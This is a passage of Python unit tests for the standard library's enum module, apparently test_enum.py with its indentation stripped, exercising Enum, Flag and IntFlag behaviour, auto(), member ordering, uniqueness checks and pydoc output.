self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Color(Flag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>')
self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertWarns(DeprecationWarning):
self.assertFalse('BLACK' in Color)
with self.assertWarns(DeprecationWarning):
self.assertFalse('RO' in Open)
with self.assertWarns(DeprecationWarning):
self.assertFalse(1 in Color)
with self.assertWarns(DeprecationWarning):
self.assertFalse(1 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_cascading_failure(self):
class Bizarre(Flag):
c = 3
d = 4
f = 6
# Bizarre.c | Bizarre.d
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_bizarre(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>')
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# check that only 248 composite members were created: 8 canonical members plus 248 composites gives 256 distinct values
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
X = 1 << 0
W = 1 << 1
R = 1 << 2
class Color(IntFlag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
def test_type(self):
Perm = self.Perm
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm.R | 8), 'Perm.8|R')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(Perm(8)), 'Perm.8')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8')
self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
self.assertEqual(str(Perm(~8)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(Open(4)), 'Open.4')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(8)), '<Perm.8: 8>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>')
self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>')
self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(Open(4)), '<Open.4: 4>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>')
self.assertEqual(repr(~Open.AC), '<Open.CE: -4>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>')
self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, ~i.value)
self.assertEqual((~i).value, ~i.value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
Color = self.Color
Open = self.Open
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertWarns(DeprecationWarning):
self.assertFalse('GREEN' in Color)
with self.assertWarns(DeprecationWarning):
self.assertFalse('RW' in Open)
with self.assertWarns(DeprecationWarning):
self.assertFalse(2 in Color)
with self.assertWarns(DeprecationWarning):
self.assertFalse(2 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertWarns(DeprecationWarning):
self.assertFalse('swallow' in RW)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# check that only 248 composite members were created: 8 canonical members plus 248 composites gives 256 distinct values
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@unique
class Silly(Enum):
one = 1
two = 'dos'
name = 3
@unique
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumMeta),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(values.keys(), result.keys())
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumMeta),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumMeta, object=EnumMeta.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum)
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexicographical name in that case.
